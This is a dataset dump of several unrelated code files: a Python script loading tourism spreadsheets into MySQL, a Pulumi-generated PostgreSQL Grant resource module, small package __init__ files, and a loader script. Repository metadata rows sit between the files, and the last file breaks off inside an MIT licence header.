values = (number, nation, plane, train, ship, car, total)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select the inserted columns to verify the load
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2015_c")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
# Print the inserted row count
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2015_d.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΔΕΚΕΜ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the database
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2015_d(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2015_d( number , nation, plane, train, ship, car, total ) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
# Loop through each row in the XLS file, starting at row index 76 to skip the header rows
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
values = (number, nation, plane, train, ship, car, total)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select the inserted columns to verify the load
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2015_d")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
# Print the inserted row count
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close() | 35.754729 | 202 | 0.632955 | 7,371 | 56,707 | 4.746981 | 0.018179 | 0.056588 | 0.052015 | 0.056016 | 0.997685 | 0.997685 | 0.997685 | 0.997685 | 0.997685 | 0.997685 | 0 | 0.024992 | 0.266158 | 56,707 | 1,586 | 203 | 35.754729 | 0.815831 | 0.266263 | 0 | 0.893168 | 0 | 0.049689 | 0.282049 | 0.021716 | 0 | 0 | 0 | 0 | 0 | 1 | 0.001242 | false | 0.049689 | 0.004969 | 0 | 0.006211 | 0.099379 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fa53b22eba03c0873a52d76150ca20adb20c0ce6 | 225 | py | Python | octadocs_adr/facets/__init__.py | octadocs/octadocs | 62f4340681f4e38ed961b58c5147a657363cae4d | [
"MIT"
] | 1 | 2021-11-19T22:48:27.000Z | 2021-11-19T22:48:27.000Z | octadocs_adr/facets/__init__.py | octadocs/octadocs | 62f4340681f4e38ed961b58c5147a657363cae4d | [
"MIT"
] | 34 | 2020-12-27T11:49:08.000Z | 2021-10-05T04:58:54.000Z | octadocs_adr/facets/__init__.py | octadocs/octadocs | 62f4340681f4e38ed961b58c5147a657363cae4d | [
"MIT"
] | null | null | null | from octadocs_adr.facets.status import status
from octadocs_adr.facets.status_class import status_class
from octadocs_adr.facets.adr_list import adr_list
from octadocs_adr.facets.sidebar import page_sidebar, sidebar_property
| 45 | 70 | 0.884444 | 35 | 225 | 5.4 | 0.314286 | 0.253968 | 0.31746 | 0.444444 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075556 | 225 | 4 | 71 | 56.25 | 0.908654 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d7429d51a96699ee3890609376af17e3572e816b | 24,145 | py | Python | sdk/python/pulumi_postgresql/grant.py | pulumi/pulumi-postgresql | 8a3b528217aafd48f58e40e4196acd0fb740bef6 | [
"ECL-2.0",
"Apache-2.0"
] | 18 | 2019-08-13T08:01:04.000Z | 2021-11-24T18:54:20.000Z | sdk/python/pulumi_postgresql/grant.py | pulumi/pulumi-postgresql | 8a3b528217aafd48f58e40e4196acd0fb740bef6 | [
"ECL-2.0",
"Apache-2.0"
] | 56 | 2019-06-21T18:31:15.000Z | 2022-03-25T20:00:13.000Z | sdk/python/pulumi_postgresql/grant.py | pulumi/pulumi-postgresql | 8a3b528217aafd48f58e40e4196acd0fb740bef6 | [
"ECL-2.0",
"Apache-2.0"
] | 6 | 2019-10-05T10:29:02.000Z | 2020-10-14T09:47:26.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['GrantArgs', 'Grant']
@pulumi.input_type
class GrantArgs:
def __init__(__self__, *,
database: pulumi.Input[str],
object_type: pulumi.Input[str],
privileges: pulumi.Input[Sequence[pulumi.Input[str]]],
role: pulumi.Input[str],
objects: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
schema: Optional[pulumi.Input[str]] = None,
with_grant_option: Optional[pulumi.Input[bool]] = None):
"""
The set of arguments for constructing a Grant resource.
:param pulumi.Input[str] database: The database to grant privileges on for this role.
:param pulumi.Input[str] object_type: The PostgreSQL object type to grant the privileges on (one of: database, schema, table, sequence, function, foreign_data_wrapper, foreign_server).
:param pulumi.Input[Sequence[pulumi.Input[str]]] privileges: The list of privileges to grant. There are different kinds of privileges: SELECT, INSERT, UPDATE, DELETE, TRUNCATE, REFERENCES, TRIGGER, CREATE, CONNECT, TEMPORARY, EXECUTE, and USAGE. An empty list could be provided to revoke all privileges for this role.
:param pulumi.Input[str] role: The name of the role to grant privileges on, Set it to "public" for all roles.
:param pulumi.Input[Sequence[pulumi.Input[str]]] objects: The objects upon which to grant the privileges. An empty list (the default) means to grant permissions on *all* objects of the specified type. You cannot specify this option if the `object_type` is `database` or `schema`.
:param pulumi.Input[str] schema: The database schema to grant privileges on for this role (Required except if object_type is "database")
:param pulumi.Input[bool] with_grant_option: Whether the recipient of these privileges can grant the same privileges to others. Defaults to false.
"""
pulumi.set(__self__, "database", database)
pulumi.set(__self__, "object_type", object_type)
pulumi.set(__self__, "privileges", privileges)
pulumi.set(__self__, "role", role)
if objects is not None:
pulumi.set(__self__, "objects", objects)
if schema is not None:
pulumi.set(__self__, "schema", schema)
if with_grant_option is not None:
pulumi.set(__self__, "with_grant_option", with_grant_option)
@property
@pulumi.getter
def database(self) -> pulumi.Input[str]:
"""
The database to grant privileges on for this role.
"""
return pulumi.get(self, "database")
@database.setter
def database(self, value: pulumi.Input[str]):
pulumi.set(self, "database", value)
@property
@pulumi.getter(name="objectType")
def object_type(self) -> pulumi.Input[str]:
"""
The PostgreSQL object type to grant the privileges on (one of: database, schema, table, sequence, function, foreign_data_wrapper, foreign_server).
"""
return pulumi.get(self, "object_type")
@object_type.setter
def object_type(self, value: pulumi.Input[str]):
pulumi.set(self, "object_type", value)
@property
@pulumi.getter
def privileges(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
The list of privileges to grant. There are different kinds of privileges: SELECT, INSERT, UPDATE, DELETE, TRUNCATE, REFERENCES, TRIGGER, CREATE, CONNECT, TEMPORARY, EXECUTE, and USAGE. An empty list could be provided to revoke all privileges for this role.
"""
return pulumi.get(self, "privileges")
@privileges.setter
def privileges(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "privileges", value)
@property
@pulumi.getter
def role(self) -> pulumi.Input[str]:
"""
The name of the role to grant privileges on, Set it to "public" for all roles.
"""
return pulumi.get(self, "role")
@role.setter
def role(self, value: pulumi.Input[str]):
pulumi.set(self, "role", value)
@property
@pulumi.getter
def objects(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The objects upon which to grant the privileges. An empty list (the default) means to grant permissions on *all* objects of the specified type. You cannot specify this option if the `object_type` is `database` or `schema`.
"""
return pulumi.get(self, "objects")
@objects.setter
def objects(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "objects", value)
@property
@pulumi.getter
def schema(self) -> Optional[pulumi.Input[str]]:
"""
The database schema to grant privileges on for this role (Required except if object_type is "database")
"""
return pulumi.get(self, "schema")
@schema.setter
def schema(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "schema", value)
@property
@pulumi.getter(name="withGrantOption")
def with_grant_option(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the recipient of these privileges can grant the same privileges to others. Defaults to false.
"""
return pulumi.get(self, "with_grant_option")
@with_grant_option.setter
def with_grant_option(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "with_grant_option", value)
@pulumi.input_type
class _GrantState:
def __init__(__self__, *,
database: Optional[pulumi.Input[str]] = None,
object_type: Optional[pulumi.Input[str]] = None,
objects: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
privileges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
role: Optional[pulumi.Input[str]] = None,
schema: Optional[pulumi.Input[str]] = None,
with_grant_option: Optional[pulumi.Input[bool]] = None):
"""
Input properties used for looking up and filtering Grant resources.
:param pulumi.Input[str] database: The database to grant privileges on for this role.
:param pulumi.Input[str] object_type: The PostgreSQL object type to grant the privileges on (one of: database, schema, table, sequence, function, foreign_data_wrapper, foreign_server).
:param pulumi.Input[Sequence[pulumi.Input[str]]] objects: The objects upon which to grant the privileges. An empty list (the default) means to grant permissions on *all* objects of the specified type. You cannot specify this option if the `object_type` is `database` or `schema`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] privileges: The list of privileges to grant. There are different kinds of privileges: SELECT, INSERT, UPDATE, DELETE, TRUNCATE, REFERENCES, TRIGGER, CREATE, CONNECT, TEMPORARY, EXECUTE, and USAGE. An empty list could be provided to revoke all privileges for this role.
:param pulumi.Input[str] role: The name of the role to grant privileges on, Set it to "public" for all roles.
:param pulumi.Input[str] schema: The database schema to grant privileges on for this role (Required except if object_type is "database")
:param pulumi.Input[bool] with_grant_option: Whether the recipient of these privileges can grant the same privileges to others. Defaults to false.
"""
if database is not None:
pulumi.set(__self__, "database", database)
if object_type is not None:
pulumi.set(__self__, "object_type", object_type)
if objects is not None:
pulumi.set(__self__, "objects", objects)
if privileges is not None:
pulumi.set(__self__, "privileges", privileges)
if role is not None:
pulumi.set(__self__, "role", role)
if schema is not None:
pulumi.set(__self__, "schema", schema)
if with_grant_option is not None:
pulumi.set(__self__, "with_grant_option", with_grant_option)
@property
@pulumi.getter
def database(self) -> Optional[pulumi.Input[str]]:
"""
The database to grant privileges on for this role.
"""
return pulumi.get(self, "database")
@database.setter
def database(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "database", value)
@property
@pulumi.getter(name="objectType")
def object_type(self) -> Optional[pulumi.Input[str]]:
"""
The PostgreSQL object type to grant the privileges on (one of: database, schema, table, sequence, function, foreign_data_wrapper, foreign_server).
"""
return pulumi.get(self, "object_type")
@object_type.setter
def object_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "object_type", value)
@property
@pulumi.getter
def objects(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The objects upon which to grant the privileges. An empty list (the default) means to grant permissions on *all* objects of the specified type. You cannot specify this option if the `object_type` is `database` or `schema`.
"""
return pulumi.get(self, "objects")
@objects.setter
def objects(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "objects", value)
@property
@pulumi.getter
def privileges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The list of privileges to grant. There are different kinds of privileges: SELECT, INSERT, UPDATE, DELETE, TRUNCATE, REFERENCES, TRIGGER, CREATE, CONNECT, TEMPORARY, EXECUTE, and USAGE. An empty list could be provided to revoke all privileges for this role.
"""
return pulumi.get(self, "privileges")
@privileges.setter
def privileges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "privileges", value)
@property
@pulumi.getter
def role(self) -> Optional[pulumi.Input[str]]:
"""
The name of the role to grant privileges on, Set it to "public" for all roles.
"""
return pulumi.get(self, "role")
@role.setter
def role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "role", value)
@property
@pulumi.getter
def schema(self) -> Optional[pulumi.Input[str]]:
"""
The database schema to grant privileges on for this role (Required except if object_type is "database")
"""
return pulumi.get(self, "schema")
@schema.setter
def schema(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "schema", value)
@property
@pulumi.getter(name="withGrantOption")
def with_grant_option(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the recipient of these privileges can grant the same privileges to others. Defaults to false.
"""
return pulumi.get(self, "with_grant_option")
@with_grant_option.setter
def with_grant_option(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "with_grant_option", value)
class Grant(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
database: Optional[pulumi.Input[str]] = None,
object_type: Optional[pulumi.Input[str]] = None,
objects: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
privileges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
role: Optional[pulumi.Input[str]] = None,
schema: Optional[pulumi.Input[str]] = None,
with_grant_option: Optional[pulumi.Input[bool]] = None,
__props__=None):
"""
The ``Grant`` resource creates and manages privileges given to a user for a database schema.
See [PostgreSQL documentation](https://www.postgresql.org/docs/current/sql-grant.html)
> **Note:** This resource needs Postgresql version 9 or above.
## Usage
```python
import pulumi
import pulumi_postgresql as postgresql
readonly_tables = postgresql.Grant("readonlyTables",
database="test_db",
object_type="table",
objects=[
"table1",
"table2",
],
privileges=["SELECT"],
role="test_role",
schema="public")
```
## Examples
Revoke default accesses for public schema:
```python
import pulumi
import pulumi_postgresql as postgresql
revoke_public = postgresql.Grant("revokePublic",
database="test_db",
object_type="schema",
privileges=[],
role="public",
schema="public")
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] database: The database to grant privileges on for this role.
:param pulumi.Input[str] object_type: The PostgreSQL object type to grant the privileges on (one of: database, schema, table, sequence, function, foreign_data_wrapper, foreign_server).
:param pulumi.Input[Sequence[pulumi.Input[str]]] objects: The objects upon which to grant the privileges. An empty list (the default) means to grant permissions on *all* objects of the specified type. You cannot specify this option if the `object_type` is `database` or `schema`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] privileges: The list of privileges to grant. There are different kinds of privileges: SELECT, INSERT, UPDATE, DELETE, TRUNCATE, REFERENCES, TRIGGER, CREATE, CONNECT, TEMPORARY, EXECUTE, and USAGE. An empty list could be provided to revoke all privileges for this role.
:param pulumi.Input[str] role: The name of the role to grant privileges on, Set it to "public" for all roles.
:param pulumi.Input[str] schema: The database schema to grant privileges on for this role (Required except if object_type is "database")
:param pulumi.Input[bool] with_grant_option: Whether the recipient of these privileges can grant the same privileges to others. Defaults to false.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: GrantArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
The ``Grant`` resource creates and manages privileges given to a user for a database schema.
See [PostgreSQL documentation](https://www.postgresql.org/docs/current/sql-grant.html)
> **Note:** This resource needs Postgresql version 9 or above.
## Usage
```python
import pulumi
import pulumi_postgresql as postgresql
readonly_tables = postgresql.Grant("readonlyTables",
database="test_db",
object_type="table",
objects=[
"table1",
"table2",
],
privileges=["SELECT"],
role="test_role",
schema="public")
```
## Examples
Revoke default accesses for public schema:
```python
import pulumi
import pulumi_postgresql as postgresql
revoke_public = postgresql.Grant("revokePublic",
database="test_db",
object_type="schema",
privileges=[],
role="public",
schema="public")
```
:param str resource_name: The name of the resource.
:param GrantArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(GrantArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
database: Optional[pulumi.Input[str]] = None,
object_type: Optional[pulumi.Input[str]] = None,
objects: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
privileges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
role: Optional[pulumi.Input[str]] = None,
schema: Optional[pulumi.Input[str]] = None,
with_grant_option: Optional[pulumi.Input[bool]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = GrantArgs.__new__(GrantArgs)
if database is None and not opts.urn:
raise TypeError("Missing required property 'database'")
__props__.__dict__["database"] = database
if object_type is None and not opts.urn:
raise TypeError("Missing required property 'object_type'")
__props__.__dict__["object_type"] = object_type
__props__.__dict__["objects"] = objects
if privileges is None and not opts.urn:
raise TypeError("Missing required property 'privileges'")
__props__.__dict__["privileges"] = privileges
if role is None and not opts.urn:
raise TypeError("Missing required property 'role'")
__props__.__dict__["role"] = role
__props__.__dict__["schema"] = schema
__props__.__dict__["with_grant_option"] = with_grant_option
super(Grant, __self__).__init__(
'postgresql:index/grant:Grant',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
database: Optional[pulumi.Input[str]] = None,
object_type: Optional[pulumi.Input[str]] = None,
objects: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
privileges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
role: Optional[pulumi.Input[str]] = None,
schema: Optional[pulumi.Input[str]] = None,
with_grant_option: Optional[pulumi.Input[bool]] = None) -> 'Grant':
"""
Get an existing Grant resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] database: The database to grant privileges on for this role.
:param pulumi.Input[str] object_type: The PostgreSQL object type to grant the privileges on (one of: database, schema, table, sequence, function, foreign_data_wrapper, foreign_server).
:param pulumi.Input[Sequence[pulumi.Input[str]]] objects: The objects upon which to grant the privileges. An empty list (the default) means to grant permissions on *all* objects of the specified type. You cannot specify this option if the `object_type` is `database` or `schema`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] privileges: The list of privileges to grant. There are different kinds of privileges: SELECT, INSERT, UPDATE, DELETE, TRUNCATE, REFERENCES, TRIGGER, CREATE, CONNECT, TEMPORARY, EXECUTE, and USAGE. An empty list could be provided to revoke all privileges for this role.
:param pulumi.Input[str] role: The name of the role to grant privileges on, Set it to "public" for all roles.
:param pulumi.Input[str] schema: The database schema to grant privileges on for this role (Required except if object_type is "database")
:param pulumi.Input[bool] with_grant_option: Whether the recipient of these privileges can grant the same privileges to others. Defaults to false.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _GrantState.__new__(_GrantState)
__props__.__dict__["database"] = database
__props__.__dict__["object_type"] = object_type
__props__.__dict__["objects"] = objects
__props__.__dict__["privileges"] = privileges
__props__.__dict__["role"] = role
__props__.__dict__["schema"] = schema
__props__.__dict__["with_grant_option"] = with_grant_option
return Grant(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def database(self) -> pulumi.Output[str]:
"""
The database to grant privileges on for this role.
"""
return pulumi.get(self, "database")
@property
@pulumi.getter(name="objectType")
def object_type(self) -> pulumi.Output[str]:
"""
The PostgreSQL object type to grant the privileges on (one of: database, schema, table, sequence, function, foreign_data_wrapper, foreign_server).
"""
return pulumi.get(self, "object_type")
@property
@pulumi.getter
def objects(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The objects upon which to grant the privileges. An empty list (the default) means to grant permissions on *all* objects of the specified type. You cannot specify this option if the `object_type` is `database` or `schema`.
"""
return pulumi.get(self, "objects")
@property
@pulumi.getter
def privileges(self) -> pulumi.Output[Sequence[str]]:
"""
The list of privileges to grant. There are different kinds of privileges: SELECT, INSERT, UPDATE, DELETE, TRUNCATE, REFERENCES, TRIGGER, CREATE, CONNECT, TEMPORARY, EXECUTE, and USAGE. An empty list could be provided to revoke all privileges for this role.
"""
return pulumi.get(self, "privileges")
@property
@pulumi.getter
def role(self) -> pulumi.Output[str]:
"""
The name of the role to grant privileges on, Set it to "public" for all roles.
"""
return pulumi.get(self, "role")
@property
@pulumi.getter
def schema(self) -> pulumi.Output[Optional[str]]:
"""
The database schema to grant privileges on for this role (Required except if object_type is "database")
"""
return pulumi.get(self, "schema")
@property
@pulumi.getter(name="withGrantOption")
def with_grant_option(self) -> pulumi.Output[Optional[bool]]:
"""
Whether the recipient of these privileges can grant the same privileges to others. Defaults to false.
"""
return pulumi.get(self, "with_grant_option")
| 47.343137 | 325 | 0.651149 | 2,939 | 24,145 | 5.192923 | 0.071793 | 0.08721 | 0.073385 | 0.03892 | 0.888547 | 0.867776 | 0.849692 | 0.830166 | 0.826825 | 0.822238 | 0 | 0.000386 | 0.248664 | 24,145 | 509 | 326 | 47.436149 | 0.840913 | 0.437399 | 0 | 0.700758 | 1 | 0 | 0.081083 | 0.002291 | 0 | 0 | 0 | 0 | 0 | 1 | 0.159091 | false | 0.003788 | 0.018939 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d77d01b6984286b9fb8b20b94311609866ad1123 | 100 | py | Python | data-acquisition/data-synthesizer/src/data_synthesizer/__init__.py | tejasmhos/clomask | 49954f1c1aa8efa775fd8f509287de93c01f2ccc | [
"MIT"
] | 8 | 2019-03-22T19:48:33.000Z | 2019-08-31T06:38:58.000Z | data-acquisition/data-synthesizer/src/data_synthesizer/__init__.py | tejasmhos/clomask | 49954f1c1aa8efa775fd8f509287de93c01f2ccc | [
"MIT"
] | 31 | 2018-10-25T09:33:13.000Z | 2021-08-25T15:29:08.000Z | data-acquisition/data-synthesizer/src/data_synthesizer/__init__.py | tejasmhos/clomask | 49954f1c1aa8efa775fd8f509287de93c01f2ccc | [
"MIT"
] | 5 | 2018-11-02T19:52:47.000Z | 2020-04-15T04:27:37.000Z | from .data_synthesizer import DataSynthesizer
from .data_synthesizer import ParallelDataSynthesizer
| 33.333333 | 53 | 0.9 | 10 | 100 | 8.8 | 0.6 | 0.181818 | 0.431818 | 0.568182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08 | 100 | 2 | 54 | 50 | 0.956522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
ad2a82d7b7b6158b5b830fb2f2d775dd6913c467 | 43 | py | Python | backend/api/decorators/__init__.py | cellador/vivid-streets | 25c641e13c9bd00987a8bffe893daecb53b1689a | [
"MIT"
] | null | null | null | backend/api/decorators/__init__.py | cellador/vivid-streets | 25c641e13c9bd00987a8bffe893daecb53b1689a | [
"MIT"
] | 14 | 2020-03-22T13:00:22.000Z | 2020-04-11T19:45:55.000Z | backend/api/decorators/__init__.py | cellador/vivid-streets | 25c641e13c9bd00987a8bffe893daecb53b1689a | [
"MIT"
] | null | null | null | from .roles_required import roles_required
| 21.5 | 42 | 0.883721 | 6 | 43 | 6 | 0.666667 | 0.722222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093023 | 43 | 1 | 43 | 43 | 0.923077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
a8eb69db27a68ec2c39272cd983facf176d48ac5 | 347 | py | Python | load/run_local.py | jhajagos/RxNormPrescribePostgreSQL | 5cee5bec3f640cd53319b95a42c4b26655abb1e3 | [
"Apache-2.0"
] | 4 | 2017-03-07T01:41:07.000Z | 2021-08-31T16:59:01.000Z | load/run_local.py | jhajagos/RxNormPrescribePostgreSQL | 5cee5bec3f640cd53319b95a42c4b26655abb1e3 | [
"Apache-2.0"
] | null | null | null | load/run_local.py | jhajagos/RxNormPrescribePostgreSQL | 5cee5bec3f640cd53319b95a42c4b26655abb1e3 | [
"Apache-2.0"
] | 2 | 2019-04-17T13:04:06.000Z | 2020-03-04T16:27:03.000Z | from generate_db_load_script import main
main("scc_pps", "E:\\data\\rxnorm\\RxNorm_full_prescribe_07052016\\rrf\\", "postgres", "", "E:\\Program Files\\PostgreSQL\\9.4\\bin\\psql", rxnorm="rxnorm_prescribe")
main("scc_pps", "E:\\data\\rxnorm\\RxNorm_full_07052016\\rrf\\", "postgres", "",
"E:\\Program Files\\PostgreSQL\\9.4\\bin\\psql") | 69.4 | 166 | 0.688761 | 49 | 347 | 4.653061 | 0.489796 | 0.157895 | 0.087719 | 0.096491 | 0.719298 | 0.719298 | 0.719298 | 0.719298 | 0.447368 | 0.447368 | 0 | 0.062305 | 0.074928 | 347 | 5 | 167 | 69.4 | 0.647975 | 0 | 0 | 0 | 1 | 0 | 0.678161 | 0.477011 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.25 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d16b34288410a01d2de15363d8865e512029e821 | 20,574 | py | Python | GolemQ/utils/path.py | wangdecheng/QAStrategy | d970242ea61cff2f1a6f69545dc7f65e8efd1672 | [
"MIT"
] | 76 | 2020-10-14T03:33:47.000Z | 2022-01-25T13:34:05.000Z | GolemQ/utils/path.py | wangdecheng/QAStrategy | d970242ea61cff2f1a6f69545dc7f65e8efd1672 | [
"MIT"
] | 4 | 2020-10-15T09:23:34.000Z | 2021-07-15T04:25:00.000Z | GolemQ/utils/path.py | wangdecheng/QAStrategy | d970242ea61cff2f1a6f69545dc7f65e8efd1672 | [
"MIT"
] | 37 | 2020-10-14T03:35:55.000Z | 2021-12-20T09:58:32.000Z | #
# The MIT License (MIT)
#
# Copyright (c) 2018-2020 azai/Rgveda/GolemQuant
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
